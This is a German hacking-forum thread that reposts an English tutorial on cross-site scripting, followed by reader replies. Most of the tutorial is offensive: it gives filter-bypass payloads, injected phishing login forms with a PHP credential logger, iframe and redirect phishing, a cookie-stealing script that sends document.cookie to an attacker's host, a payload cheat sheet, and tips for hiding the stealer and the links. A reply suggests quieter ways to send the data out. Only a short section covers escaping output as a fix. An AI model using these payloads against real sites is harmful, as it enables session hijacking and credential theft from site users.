Advanced XSS Knowledge

[novaca!ne]

Sup,
Ich möchte hie mal mein Whitepaper präsentieren.

<|-[__________________________________________________ _________________________]-|>
- -
- [ Advanced XSS Knowledge ] -
- written by novaca!ne -
- -
<|-[__________________________________________________ _________________________]-|>

# Author: novaca!ne
# Date: 23.03.2010



.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Contact: novacaine@no-trace.cc °
Website: www.novacaine.biz .
°
Artwork by: Vincenzo .
°
Greetz fly out to: .
°
Vincenzo, J0hn.X3r, fred777, .
h0yt3r, Easy Laster, td0s, °
Lorenz, Montaxx, maoshe, Palme .
and free-hack.com °
.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°. °.°.°.
Index: °
--( I ]> Introduction .
°
--( II ]> What exactly is XSS ? .
°
--( III ]> How to execute XSS commands.
°
--( IV ]> Bypass techniques .
°
--( V ]> What can we do with XSS ? .
°
--( VI ]> How to fix XSS leakages .
°
--( VII ]> Cheat Sheets .
°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.° .°.°.°


<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( I ]> Introduction
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Dear reader, I wrote this Whitepaper to sum up everything I know about XSS.
$ It was written to share knowledge, knowledge should be free and aviable
$ for everyone.
$ You can post and copy this Whitepaper as much as you want, but respect the
$ author's copyrights.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( II ]> What exactly is XSS ?
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ "XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSS
$ deals with scripting. To be more exact: Javascript (in rare cases you can even
$ inject php code). It's about injecting (almost) every Javascript (and html/css)
$ command/script in a website.
$ XSS flaws comes up everytime a website doesn't filter the attackers input.
$ In other words:
$ the attacker can inject his malicious script into a website, and the browser just
$ run's the code or script.

$ There are 3 types of XSS, I'm going to talk about the 2 most used:
$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
$ against a wall and receive him back.

$ Stored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
$ site with the malicious code.

$ DOM based XSS:
$ This is a rare used method, perhaps I'm going to write another Whitepaper about
$ DOM based XSS attack.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( III ]> How to execute XSS commads
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Actually, injecting a XSS script is very easy. To check if the target website is
$ vulnerable,just look out for a searchbox or something.
$ Let's say this is how a simple, unsecured searchfunction looks like:

content of index.html

<html>
<head>
<title>Google</title>
</head>
<body>

<form method="get" action="search.php">
Google:
<input type="text" name="search" size="20" />
<input type="submit" class="button" value="Submit" />
</form>

</body>
</html>

content of google.php

<?php echo $_GET['search']; ?>

# I'm going to use this script as an example for the rest of this paper #

$ Let's say this script is stored on a webspace, when I type in:
$ 123
$ then it leads me to the url:

http://site.ru/google.php?search=123

$ and shows me

123

$ But now, let's try to inject a simple javascript alertmessage :

<script>alert("turtles");</script>

$ and send it.
$ You can replace "turtles" with any other word you want, and even use ' ' instead
$ of " " for example:

<script>alert('1234');</script>

$ But I'm keep using "turtles" as example for the rest of this paper.
$ The target website let's us know if it's vulnerable when it prints a popup containing

$ |=========| |======|
$ | turtles | or | 1234 |
$ |=========| |======|

$ Instead of the called code, we can even inject every simple html tags e.g.:

<h1><font color="#00FF00">I like turtles</font></h1>

$ and send it.
$ Also, you can paste the code at the end of the url, and visit the site like:

www.site.ru/google.php?search=<script>alert('turtles');</script>

$ or

www.site.ru/google.php?search=<h1><font color="#00FF00">I like turtles</font></h1>

# It's like the attacker is determining the content of the website. #

$ But even if this doesn't work, there's no reason to worry: that means the website
$ uses filter techniques to avoid XSS flaws. But there are also ways to
$ bypass those filters. How this works, you're going to read in the next chapter.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( IV ]> Bypass techniques
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ There are a lot of ways to bypass XSS filters on websites, I'll number some:

$ 1.) magic_quotes_gpc=ON bypass
$ 2.) HEX encoding
$ 3.) Obfuscation
$ 4.) Trying around

$ 1.) magic_quotes_gpc=ON is a php setting (php.ini).
$ It causes that every ' (single-quote), " (double quote) and \ (backslash)
$ are escaped with a backslash automatically. It's also a wellknown method
$ to avoid XSS flaws, although it's exploitable.

$ How to bypass it when it's ON? - use the javascript function called
$ String.fromCharCode(), just convert your text in decimal characters
$ (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.

$ Using "turtles" (without quote sign) will look like this:

String.fromCharCode(116, 117, 114, 116, 108, 101, 115)

$ now insert this in your alert script:

www.site.ru/google.php?search=<script>alert(String.fromCharCod e(116, 117, 114, 116, 108, 101, 115));</script>

$ What happened? - this function converts decimal characters to ascii characters,
$ so the script tells encodet: "turtles" and decodes it in one step,
$ bit complicated, but useful to evade XSS filters.

$ 2.) HEX encoding is a useful bypass method, too. Using this step will encode
$ your script, so you can't see what the code will cause.
$ This is how

<script>alert(/turtles/);</script>

$ looks like encrypted in HEX:

www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%6 5%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F% 73%63%72%69%70%74%3E

$ (note: i used "/turtles/" (without quote sign) because just "turtles" didn't work).

$ 3.) Obfuscation - sometimes website administrator simply put words like
$ "script","alert()","''" on the "badwords list", that means, when you
$ search for "script" on the website, it just shows you an error, like
$ "you are not allowed to search for this word" or something.
$ but this is a weak protection, you can bypass it using obfuscation.
$ your javascript code like:

<sCrIpT>alert('turtles');</ScRiPt>

$ There are like unlimited possibilities, but that leads us to the
$ next chapter...

$ 4.) Trying around: sometimes you just got to try around, because every website
$ is secured/unsecured in a different, unique way. Some doesn't even use
$ cookies for example. Alway's keep a look at the website's sourcecode!
$ Sometimes you need to adjust your XSS script, like:

"><script>alert(/turtles/);</script>

$ This you need sometimes if you injected your code into a searchbox e.g. and
$ interrupt a html tag, so you first need to close him, then start a new
$ tag (<script>...).

$ Anyway, there are lot's of different methods how to bypass XSS filtration,
$ try around !

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( V ]> What can we do with XSS ?
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Til now I showed you how to spawn a javascript alert message on a website.
$ But now I'll show you how harmful such a XSS flaw can be for your website. Here are
$ some attack techniques you can do with a XSS flaw:

$ 1.) Inject a Phishing script
$ 2.) Iframe Phishing
$ 3.) Rediriction Phishing
$ 4.) Cookie stealing

$ 1.) Phishing script inject: Just inject a 'user' and 'passwort' field in html
$ (With the <html> and <body> tags), that the victim may think he need's
$ to login to the target site.

$ Here an example:

www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>

content of phishingscript.php

<?php
$login = $_POST['user'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

$ 2.) Iframe Phishing: Simple thing, just inject a javascript code containing an
$ iframe where your phishing site is embeeded.
$ Obviously it needs to look just like the target site.

$ Here an example:

www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>

$ (Note: height="100%" width="100%" means that the whole window is filled with
$ that iframe.)
$ The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
$ difference and log in (If they're are foolish enough).

$ 3.) Rediriction Phishing: Also simple, just inject a javascript rediriction
$ script that leads to your phishingsite, of course it needs to look just
$ like the target site.

$ Here an example:

www.site.ru/google.php?search=<script>document.location.href=" http://www.yourphishingsite.ru"</script>

$ or

www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">

$ 4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
$ attack. In this method you need to do following:

$ Place this cookiestealer.php in your hoster, and then inject a javascript
$ with your cookiestealer script embedded on your target website.

content of cookiestealer.php (found it somewhere with google)

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>

$ Save it as cookiestealer.php and create a 'log.txt' and upload both files
$ on your own webspace, in the same directory and set "chmod 777".

$ Inject the following code in your target website:

http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

$ Then the victim's cookie (target's website user who visited the url above) should
$ appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
$ and use it.

$ Obviously you need to replace

http://www.yourphishingsite.ru

$ With the url of your phishingsite.

# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicous. #

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( VI ]> How to fix XSS leakages
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ XSS flaws can be very dangerous for your website, even though you can easily
$ secure your own website using the following functions.

################################################## ########
# #
# htmlspecialchars() #
# http://php.net/manual/de/function.htmlspecialchars.php #
# #
################################################## ########

Example usage:

google.php:

<?php echo htmlspecialchars($_GET['search']); ?>

$ OR

################################################## ########
# #
# htmlentities() #
# http://php.net/manual/de/function.htmlentities.php #
# #
################################################## ########

Example usage:

google.php:

<?php echo htmlentities($_GET['search']); ?>

$ What happened? - the function simply replaced every specialchar to a harmless html char.
$ For example when I enter

<script>alert("turtles");</script>

$ it appears

<script>alert("turtles");</script>

$ But without any popup, because the <,>,',"
$ turned into <,>,',"
$ The attackers input has become a harmless, unexecutable html code.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( VII ]> Cheat Sheets
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
$ Enjoy.

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

################################################## ###########
# #
# PROTIP FOR EVERY XSS INJECTION: #
# use url shortener services such as tinyurl.com or bit.ly #
# to 'hide' your injection, so the victim won't know what's #
# behind that url. #
# #
################################################## ###########

END OF FILE

Man kann es auch hier nachlesen:
http://www.exploit-db.com/papers/11860

Ich würde gerne Feedback hören

Mfg, n0va

[robbys22]

Sehr gutes Tut, obwohl es auf Englisch ist, hab ichs sogar verstanden wie es geht

[0x30]

Da diese Tutorial in Englisch verfasst wurde, wird es hier wohl nicht sehr Feedback bekommen.
Eigentlich gibt es schon genügen Tutorials über das Ganze aber dennoch schon zusammen gefasst auch wenn nichts neues dabei ist.

$ 2.) HEX encoding is a useful bypass method, too. Using this step will encode
$ your script, so you can't see what the code will cause.
$ This is how

<script>alert(/turtles/);</script>

$ looks like encrypted in HEX:

www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%6 5%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F% 73%63%72%69%70%74%3E

$ (note: i used "/turtles/" (without quote sign) because just "turtles" didn't work).

Um es gleich richtig zu machen alert(/turtles/.source); damit man auch wirklich nur turtles in der Alertbox stehen hat.

[trisn]

Hab ich nur so das gefühl oder is jedes Tutorial gleich ?
Also vom sinn her , ich habe schon ein paar Varianten von XSS hier gepostet gehabt , da die Leute aber keine "große erfolgschance" dabei sehen oder einfach nur zu faul sind um mit etwas JavaScript zu arbeiten wirst du kaum ein wirklich großes Feedback bekommen

[c1ox]

Warum sollte jeder der das nützlich findet dann Feedback schreiben? (:
Ich drück den THX-Button und das wars.

[0x30]

Weil man in der Regel gerne wissen möchte, was man noch verbessern kann oder was gut war.
Ohne Feedbacks und konstruktive Kritik, kann man sich nicht verbessern.

[The-God-of-all]

$ Inject the following code in your target website:

http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

$ Then the victim's cookie (target's website user who visited the url above) should
$ appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
$ and use it.

Das ist aber etwas auffällig wenn die Person auf einmal auf eine andere Webseite weitergeleitet wird? Ich würde in dem Fall eher ein kleines iframe oder so etwas benutzen. Vielleicht kriegt man es auch mit einem XMLHttpRequest hin die Daten an eine andere Seite zu senden. Das wäre noch unauffälliger, sollte aber von den Browsern verhindert werden.

Ansonsten muss ich mich meinen Vorrednern anschließen, im Grunde stand da nur das drinnen was ich ohnehin schon wusste. Womit ich nichts anfangen kann ist "DOM based XSS". Wenn du darüber nochwas schreiben könntest würdest du mir zumindest was neues erzählen. Das würde mich wirklich interessieren, vor allem weil ich jetzt auch nicht weiß was ich als Website Coder dagegen tun kann. Die anderen beiden sind ein alter Hut und werden auf meinen Seiten sicher nicht funktionieren.

Zu dem Thema, dass das Tutorial auf Englisch ist: Heutzutage gibt es so viele Informationen auf Englisch. Das braucht man inzwischen fast überall. Und die meisten lernen das auch in der Schule, also sollte eigentlich fast jeder genug Englisch können um das zu lesen. Mir ist es inzwischen eh egal ob die Infos zu einem Thema auf Englisch oder Deutsch sind, ich kann beides gut genug lesen. Es gibt ohnehin unzählige Informationen die man auf Deutsch nicht bekommt bzw. nur in schlechter Qualität (Da fallen mir spontan die ganzen Automatisch übersetzten Seiten von MSDN ein - bevor man die Liest kann man die auch geradee ordentlich auf Englisch lesen).